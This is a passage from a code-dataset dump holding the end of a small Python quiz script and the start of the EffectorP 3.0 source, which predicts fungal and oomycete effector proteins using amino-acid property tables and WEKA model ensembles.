quiz functions\n# set introduction prompts\n# call functions for each quiz\n# culminate with a final score\n# import powershell_quiz as ps\nimport math\nimport python_quiz as pyt\n\n# def progress_bar(progress, total):\n# percent = 100 * (progress / float(total))\n# bar = '█' * int(percent) + '-' * (100 - int(percent))\n# print(f\"\\r|{bar}| {percent:.2f}%\", end=\"\\r\")\n \n# numbers = [x * 5 for x in range(2000, 3000)]\n# results = []\n\n# for i, x in enumerate(numbers):\n# results.append(math.factorials(x))\n# progress_bar(0, len(numbers))\n\nprint('Welcome to the quiz nexus!' )\n\nplaying = input(\"Do you want to learn? \")\n\nif playing.lower() != \"yes\":\n quit()\n print(\"OK! Let's go! \")\n \npyt.pythonTest()\n\ndef nexusGreetings():\n print('Welcome to the quiz nexus!' )","repo_name":"cortuga/Quiz-Nexus","sub_path":"Nexus.py","file_name":"Nexus.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16176275503","text":"import os\nimport sys\nimport subprocess\nimport io\nimport getopt\n# -----------------------------------------------------------------------------------------------------------\n# Global variables\n# -----------------------------------------------------------------------------------------------------------\nARFF_HEADER = '''@RELATION effectors\n@ATTRIBUTE A NUMERIC\n@ATTRIBUTE C NUMERIC\n@ATTRIBUTE D NUMERIC\n@ATTRIBUTE E NUMERIC\n@ATTRIBUTE F NUMERIC\n@ATTRIBUTE G NUMERIC\n@ATTRIBUTE H NUMERIC\n@ATTRIBUTE I NUMERIC\n@ATTRIBUTE K NUMERIC\n@ATTRIBUTE L NUMERIC\n@ATTRIBUTE M NUMERIC\n@ATTRIBUTE N NUMERIC\n@ATTRIBUTE P NUMERIC\n@ATTRIBUTE Q NUMERIC\n@ATTRIBUTE R NUMERIC\n@ATTRIBUTE S NUMERIC\n@ATTRIBUTE T NUMERIC\n@ATTRIBUTE V NUMERIC\n@ATTRIBUTE W NUMERIC\n@ATTRIBUTE Y NUMERIC\n@ATTRIBUTE MolecularWeight NUMERIC\n@ATTRIBUTE PosCharge NUMERIC\n@ATTRIBUTE NegCharge NUMERIC\n@ATTRIBUTE Exposed NUMERIC\n@ATTRIBUTE Hydrophobicity NUMERIC\n@ATTRIBUTE polarity NUMERIC\n@ATTRIBUTE flexibility NUMERIC\n@ATTRIBUTE aromatic NUMERIC\n@ATTRIBUTE polar NUMERIC\n@ATTRIBUTE disorder NUMERIC\n@ATTRIBUTE Bulky NUMERIC\n@ATTRIBUTE Alpha NUMERIC\n@ATTRIBUTE Beta NUMERIC\n@ATTRIBUTE Coil NUMERIC\n@ATTRIBUTE class {effector,non-effector}\n@DATA\n'''\n# -----------------------------------------------------------------------------------------------------------\nSCRIPT_PATH = sys.path[0]\n\nmodels_bayes_cytoplasmic_fungionly = [SCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration75_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration100_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration41_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration31_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration16_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration84_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration2_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration96_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration34_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration64_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration88_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration23_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration32_ratio3.model']\n\nmodels_J48_cytoplasmic_fungionly = [SCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration77_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration61_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration95_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration56_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration58_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration87_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration25_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration97_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration13_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration22_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration21_ratio3.model']\n\nmodels_bayes_cytoplasmic = [SCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration39_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration17_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration76_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration74_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration79_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration1_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration32_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration70_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration77_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration14_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration71_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration44_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration62_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration64_ratio3.model']\n\nmodels_J48_cytoplasmic = [SCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration36_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration14_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration63_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration60_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration29_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration67_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration1_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration34_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration36_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration71_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration67_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration70_ratio3.model']\n\nmodels_bayes_apoplastic = [SCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration19_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration70_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration80_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration40_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration31_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration98_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration76_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration53_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration61_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration79_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration29_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration32_ratio3.model']\n\nmodels_J48_apoplastic = [SCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration82_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration19_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration47_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration100_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration26_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration98_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration49_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration9_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration25_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration95_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration77_ratio3.model']\n# -----------------------------------------------------------------------------------------------------------\n# Hydrophobicity (Fauchere and Pliska, 1983)\nHYDRO_DIC = {\n'R': -1.01,\n'K': -0.99, \n'D': -0.77, \n'E': -0.64, \n'N': -0.6,\n'Q': -0.22, \n'S': -0.04, \n'G': -0.0, \n'H': 0.13, \n'T': 0.26, \n'A': 0.31, \n'P': 0.72, \n'Y': 0.96, \n'V': 1.22,\n'C': 1.54, \n'L': 1.7, \n'F': 1.79, \n'I': 1.8, \n'M': 1.23 , \n'W': 2.25}\n\n# Taken from http://www.cprofiler.org/help.html\n# Surface exposure (Janin, 1979), these are free energy values\nEXPOSED_DIC = {\n'A': 0.3, \n'R': -1.4,\n'N': -0.5,\n'D': -0.6, \n'C': 0.9, \n'Q': -0.7, \n'E': -0.7, \n'G': 0.3, \n'H': -0.1, \n'I': 0.7, \n'L': 0.5, \n'K': -1.8, \n'M': 0.4, \n'F': 0.5, \n'P': -0.3, \n'S': -0.1, \n'T': -0.2, \n'W': 0.3, \n'Y': -0.4, \n'V': 0.6}\n\n# Flexibility (Vihinen et al., 1994)\nFLEX_DIC = {\n'A': 0.984, \n'R': 1.008,\n'N': 1.048,\n'D': 1.068, \n'C': 0.906, \n'Q': 1.037, \n'E': 1.094, \n'G': 1.031, \n'H': 0.950, \n'I': 0.927, \n'L': 0.935, \n'K': 1.102, \n'M': 0.952, \n'F': 0.915, \n'P': 1.049, \n'S': 1.046, \n'T': 0.997, \n'W': 0.904, \n'Y': 0.929, \n'V': 0.931}\n\n# Alpha helix frequency (Nagano, 1973)\nALPHA_DIC = {\n'Y': 0.63, \n'P': 0.70, \n'G': 0.72,\n'N': 0.77,\n'S': 0.78,\n'R': 0.83,\n'T': 0.87,\n'C': 0.94,\n'I': 0.94,\n'V': 0.97,\n'D': 1.00,\n'W': 1.06,\n'Q': 1.10,\n'L': 1.23,\n'K': 1.23,\n'M': 1.23,\n'F': 1.23,\n'A': 1.29,\n'H': 1.29,\n'E': 1.54}\n\n# Beta structure frequency (Nagano, 1973)\nBETA_DIC = {\n'Y': 1.07, \n'P': 0.75, \n'G': 0.9,\n'N': 0.72,\n'S': 0.77,\n'R': 0.67,\n'T': 1.23,\n'C': 1.13,\n'I': 1.54,\n'V': 1.41,\n'D': 0.9,\n'W': 1.13,\n'Q': 1.18,\n'L': 1.26,\n'K': 0.81,\n'M': 1.29,\n'F': 1.37,\n'A': 0.96,\n'H': 0.87,\n'E': 0.33}\n\n# Coil propensity (Nagano, 1973)\nCOIL_DIC = {\n 'F' : 0.58,\n 'M' : 0.62,\n 'L' : 0.63, \n 'A' : 0.72,\n 'E' : 0.75,\n 'H' : 0.76,\n 'I' : 0.8, \n 'Q' : 0.81, \n 'V' : 0.83, \n 'K' : 0.84, \n 'W' : 0.87, \n 'C' : 1.01, \n 'T' : 1.03, \n 'D' : 1.04,\n 'R' : 1.33, \n 'S' : 1.34, \n 'G' : 1.35, \n 'Y' : 1.35, \n 'N' : 1.38, \n 'P' : 1.43}\n\n# Polarity (Zimmerman et al., 1968)\nPOLARITY_DIC = {\n'Y': 1.61, \n'P': 1.58, \n'G': 0.0,\n'N': 3.38,\n'S': 1.67,\n'R': 52.0,\n'T': 1.66,\n'C': 1.48,\n'I': 0.13,\n'V': 0.13,\n'D': 49.7,\n'W': 2.1,\n'Q': 3.53,\n'L': 0.13,\n'K': 49.5,\n'M': 1.43,\n'F': 0.35,\n'A': 0.0,\n'H': 51.6,\n'E': 49.9}\n\n# Disorder propensity (Dunker et al., 2001)\nDISORDER_DIC = {\n'A': 1.0,\n'R': 1.0,\n'S': 1.0,\n'Q': 1.0,\n'E': 1.0,\n'G': 1.0,\n'K': 1.0,\n'P': 1.0,\n'D': 0.0,\n'H': 0.0,\n'M': 0.0,\n'T': 0.0,\n'N': -1.0,\n'C': -1.0,\n'I': -1.0,\n'L': -1.0,\n'F': -1.0,\n'W': -1.0,\n'Y': -1.0,\n'V': -1.0}\n\n# Bulkiness (Zimmerman et al., 1968)\nBULKY_DIC = {\n'G' : 3.4,\n'S' : 9.47, \n'A' : 11.5, \n'D' : 11.68, \n'N' : 12.82, \n'C' : 13.46, \n'E' : 13.57, \n'H' : 13.69, \n'R' : 14.28,\n'Q' : 14.45, \n'K' : 15.71, \n'T' : 15.77,\n'M' : 16.25, \n'P' : 17.43,\n'Y' : 18.03, \n'F' : 19.8, \n'I' : 21.4,\n'L' : 21.4, \n'V' : 21.57, \n'W' : 21.67} \n\n# Charged amino acids, 1 are positively charged residues (K, R); -1 are negatively charged residues (D, E)\nCHARGE_DIC = {\n 'K' : 1,\n 'R' : 1,\n 'D' : -1,\n 'E' : -1}\n\n# Polarity (Zimmerman et al., 1968)\nPOLARITY_DIC = {\n 'A' : 0.0,\n 'G' : 0.0,\n 'I' : 0.13,\n 'L' : 0.13,\n 'V' : 0.13,\n 'F' : 0.35,\n 'M' : 1.43,\n 'C' : 1.48,\n 'P' : 1.58,\n 'Y' : 1.61,\n 'T' : 1.66,\n 'S' : 1.67,\n 'W' : 2.1,\n 'N' : 3.38,\n 'Q' : 3.53,\n 'K' : 49.5,\n 'D' : 49.7,\n 'E' : 49.9,\n 'H' : 51.6,\n 'R' : 52.0}\n\nMOLECULAR_WEIGHT_DIC = {\n'A': 71.0788,\n'B': 114.5962,\n'C': 103.1388,\n'D': 115.0886,\n'E': 129.1155,\n'F': 147.1766,\n'G': 57.0519,\n'H': 137.1411,\n'I': 113.1594,\n'J': 113.1594,\n'K': 128.1741,\n'L': 113.1594,\n'M': 131.1926,\n'N': 114.1038,\n'O': 237.3018,\n'P': 97.1167,\n'Q': 128.1307,\n'R': 156.1875,\n'S': 87.0782,\n'T': 101.1051,\n'U': 150.0388,\n'V': 99.1326,\n'W': 186.2132,\n'X': 118.8860,\n'Y': 163.1760,\n'Z': 128.6231} \n# -----------------------------------------------------------------------------------------------------------\n\n# -----------------------------------------------------------------------------------------------------------\n# Functions\n# -----------------------------------------------------------------------------------------------------------\ndef usage():\n \"\"\" Function: usage()\n Purpose: Print helpful information for the user. \n \n Input: None.\n \n Return: Print options for running EffectorP 3.0. \n \"\"\"\n print('''\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# EffectorP 3.0: Prediction of apoplastic and cytoplasmic effectors in fungi and oomycetes\n# http://effectorp.csiro.au/\n# Copyright (C) 2021-2022 Jana Sperschneider.\n# Freely distributed under the GNU General Public License (GPLv3).\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n ''')\n print(\"Usage for EffectorP 3.0: \")\n print(\"python EffectorP.py [-options] -i \")\n print()\n print(\"where basic options are:\")\n print(\"-f : run in fungal mode\") \n print(\"-h : show brief help on version and usage\")\n print()\n print(\"options directing output:\")\n print(\"-o : direct tab-delimited output table with predictions to file , not stdout\")\n print(\"-E : save predicted effectors to FASTA file \") \n print(\"-N : save predicted non-effectors to FASTA file \") \n print()\n print(\"# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\")\n print()\n sys.exit() \n\n return\n# -----------------------------------------------------------------------------------------------------------\ndef scan_arguments(commandline):\n \"\"\" Function: scan_arguments()\n Purpose: Scan the input options given to the EffectorP program. \n \n Input: Input options given by the user.\n \n Return: Parsed options.\n \"\"\"\n try:\n opts, args = getopt.getopt(commandline, \"hfso:E:N:i:\", [\"help\"]) \n except getopt.GetoptError as err:\n # print help information and exit:\n print(str(err)) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n FASTA_FILE = None\n output_file = None\n effector_output = None\n noneffector_output = None\n FUNGAL_MODE = False\n\n i_count, o_count, E_count, N_count, P_count = 0, 0, 0, 0, 0\n \n for opt, arg in opts:\n if opt in (\"-o\"):\n output_file = arg\n o_count += 1\n elif opt in (\"-f\"):\n FUNGAL_MODE = True \n elif opt in (\"-i\"):\n FASTA_FILE = arg\n i_count += 1\n elif opt in (\"-E\"):\n effector_output = arg\n E_count += 1\n elif opt in (\"-N\"):\n noneffector_output = arg\n N_count += 1\n elif opt in (\"-h\", \"--help\"):\n usage()\n else:\n print()\n print (\"Commandline option was supplied that was not recognized!\")\n usage()\n\n if i_count > 1 or o_count > 1 or E_count > 1 or N_count > 1:\n usage()\n\n return FASTA_FILE, FUNGAL_MODE, output_file, effector_output, noneffector_output\n# -----------------------------------------------------------------------------------------------------------\ndef SimpleFastaParser(handle):\n for line in handle:\n if line[0] == \">\":\n title = line[1:].rstrip()\n break\n\n lines = []\n for line in handle:\n if line[0] == \">\":\n yield title, \"\".join(lines).replace(\" \", \"\").replace(\"\\r\", \"\")\n lines = []\n title = line[1:].rstrip()\n continue\n lines.append(line.rstrip())\n\n yield title, \"\".join(lines).replace(\" \", \"\").replace(\"\\r\", \"\")\n# -----------------------------------------------------------------------------------------------------------\ndef get_effector_predictions(ORIGINAL_IDENTIFIERS, SEQUENCES, EFFECTOR_THRESHOLD, ensembl_votes_cytoplasmic, ensembl_votes_apoplastic):\n\n models_cytoplasmic = models_bayes_cytoplasmic + models_J48_cytoplasmic\n models_apoplastic = models_bayes_apoplastic + models_J48_apoplastic\n\n ensemble_predictions, predicted_effectors, predicted_noneffectors = [], [], []\n cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors = {}, {}, {}, {}\n\n for index, (ident, seq) in enumerate(zip(ORIGINAL_IDENTIFIERS, SEQUENCES)):\n\n # Be careful to use this short identifier later, \n # if all identifiers are equal, predictions will fail if not used\n short_ident = 'protein' + str(index)\n yes_prob_cytoplasmic, no_prob_cytoplasmic = [], []\n yes_prob_apoplastic, no_prob_apoplastic = [], []\n\n for vote, prob in ensembl_votes_cytoplasmic[short_ident]:\n\n if vote == 'Non-effector':\n no_prob_cytoplasmic.append(prob)\n yes_prob_cytoplasmic.append(1.0 - prob) \n\n if vote == 'Effector':\n yes_prob_cytoplasmic.append(prob)\n no_prob_cytoplasmic.append(1.0 - prob) \n\n for vote, prob in ensembl_votes_apoplastic[short_ident]:\n\n if vote == 'Non-effector':\n no_prob_apoplastic.append(prob)\n yes_prob_apoplastic.append(1.0 - prob) \n\n if vote == 'Effector':\n yes_prob_apoplastic.append(prob)\n no_prob_apoplastic.append(1.0 - prob) \n\n # Soft voting: argmax of the sum of predicted probabilities\n yes_prob_cytoplasmic = round(sum(yes_prob_cytoplasmic)/float(len(models_cytoplasmic)),3)\n no_prob_cytoplasmic = round(sum(no_prob_cytoplasmic)/float(len(models_cytoplasmic)),3)\n yes_prob_apoplastic = round(sum(yes_prob_apoplastic)/float(len(models_apoplastic)),3)\n no_prob_apoplastic = round(sum(no_prob_apoplastic)/float(len(models_apoplastic)),3) \n\n cytoplasmic_prediction = False\n apoplastic_prediction = False\n\n if yes_prob_cytoplasmic >= EFFECTOR_THRESHOLD or yes_prob_apoplastic >= EFFECTOR_THRESHOLD:\n # Is it more likely a cytoplasmic effector\n if yes_prob_cytoplasmic >= yes_prob_apoplastic:\n\n if yes_prob_apoplastic >= EFFECTOR_THRESHOLD:\n prediction = 'Cytoplasmic effector (apoplastic effector: ' + str(yes_prob_apoplastic) + ')'\n prob = yes_prob_cytoplasmic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n cyto_apo_effectors[short_ident] = [yes_prob_cytoplasmic, yes_prob_apoplastic, seq] \n else:\n prediction = 'Cytoplasmic effector'\n prob = yes_prob_cytoplasmic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n cyto_effectors[short_ident] = [yes_prob_cytoplasmic, seq] \n\n # Is it more likely an apoplastic effector \n if yes_prob_apoplastic > yes_prob_cytoplasmic:\n\n if yes_prob_cytoplasmic >= EFFECTOR_THRESHOLD:\n prediction = 'Apoplastic effector (cytoplasmic effector: ' + str(yes_prob_cytoplasmic) + ')'\n prob = yes_prob_apoplastic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n apo_cyto_effectors[short_ident] = [yes_prob_apoplastic, yes_prob_cytoplasmic, seq] \n\n else:\n prediction = 'Apoplastic effector'\n prob = yes_prob_apoplastic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n apo_effectors[short_ident] = [yes_prob_apoplastic, seq] \n\n if yes_prob_cytoplasmic < EFFECTOR_THRESHOLD and yes_prob_apoplastic < EFFECTOR_THRESHOLD:\n prediction = 'Non-effector'\n prob = round(min(no_prob_cytoplasmic, no_prob_apoplastic),3)\n predicted_noneffectors.append((ident.strip(), prob, seq))\n\n ensemble_predictions.append((ident.strip(), prediction, prob, seq)) \n\n return ensemble_predictions, predicted_effectors, predicted_noneffectors, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors\n# ----------------------------------------------------------------------------------------------------------- \ndef get_model_predictions(WEKA_PATH, RESULTS_PATH, MODELS, CLASSIFIER, ensembl_votes, ORIGINAL_IDENTIFIERS, SEQUENCES):\n\n for model in MODELS:\n #--------------------------------------------------------------\n ParamList = ['java', '-cp', WEKA_PATH, CLASSIFIER, '-l', model, '-T', RESULTS_PATH + 'weka.arff', '-p', 'first-last']\n\n with open(RESULTS_PATH + 'Predictions.txt', 'wb') as out:\n try:\n Process = subprocess.Popen(ParamList, shell=False, stdout=out)\n sts = Process.wait()\n cstdout, cstderr = Process.communicate()\n\n if Process.returncode:\n raise Exception(\"Calling WEKA returned %s\"%Process.returncode)\n if cstdout:\n pass\n elif cstderr:\n sys.exit()\n except:\n e = sys.exc_info()[1]\n print(\"Error calling WEKA: %s\" % e)\n sys.exit(1)\n #-------------------------------------------------------------- \n # Parse the WEKA output file\n file_input = RESULTS_PATH + 'Predictions.txt'\n predicted_effectors, predicted_noneffectors, predictions = parse_weka_output(file_input, ORIGINAL_IDENTIFIERS, SEQUENCES)\n \n for index, (ident, prediction, prob, seq) in enumerate(predictions):\n\n short_ident = 'protein' + str(index)\n\n if short_ident in ensembl_votes:\n previous_predictions = ensembl_votes[short_ident] \n ensembl_votes[short_ident] = previous_predictions + [(prediction, prob)]\n else:\n ensembl_votes[short_ident] = [(prediction, prob)]\n\n return ensembl_votes\n# ----------------------------------------------------------------------------------------------------------- \ndef write_weka_input(weka_input, SHORT_IDENTIFIERS, SEQUENCES):\n \"\"\" Function: write_weka_input()\n Purpose: Given the query identifiers and \n protein features, write the input arff file for WEKA. \n \n Input: WEKA arff file name, query identifiers. \n \n Return: None. \n \"\"\" \n with open(weka_input, 'w') as f:\n # Create a list of features for each protein\n X = [[] for __ in range(len(SHORT_IDENTIFIERS))]\n\n for protein_position, TARGET_ID in enumerate(SHORT_IDENTIFIERS):\n TARGET_ID = TARGET_ID.replace('>', '')\n TARGET_ID = TARGET_ID.strip()\n sequence = SEQUENCES[protein_position]\n\n length = len(sequence)\n\n # Amino acid frequencies in the sequence\n amino_acid_frequencies = []\n amino_acid_frequencies.append(100.0*sequence.count('A')/length)\n amino_acid_frequencies.append(100.0*sequence.count('C')/length)\n amino_acid_frequencies.append(100.0*sequence.count('D')/length)\n amino_acid_frequencies.append(100.0*sequence.count('E')/length)\n amino_acid_frequencies.append(100.0*sequence.count('F')/length)\n amino_acid_frequencies.append(100.0*sequence.count('G')/length)\n amino_acid_frequencies.append(100.0*sequence.count('H')/length)\n amino_acid_frequencies.append(100.0*sequence.count('I')/length)\n amino_acid_frequencies.append(100.0*sequence.count('K')/length)\n amino_acid_frequencies.append(100.0*sequence.count('L')/length)\n amino_acid_frequencies.append(100.0*sequence.count('M')/length)\n amino_acid_frequencies.append(100.0*sequence.count('N')/length)\n amino_acid_frequencies.append(100.0*sequence.count('P')/length)\n amino_acid_frequencies.append(100.0*sequence.count('Q')/length)\n amino_acid_frequencies.append(100.0*sequence.count('R')/length)\n amino_acid_frequencies.append(100.0*sequence.count('S')/length)\n amino_acid_frequencies.append(100.0*sequence.count('T')/length)\n amino_acid_frequencies.append(100.0*sequence.count('V')/length)\n amino_acid_frequencies.append(100.0*sequence.count('W')/length)\n amino_acid_frequencies.append(100.0*sequence.count('Y')/length)\n\n\n molecular_weight = 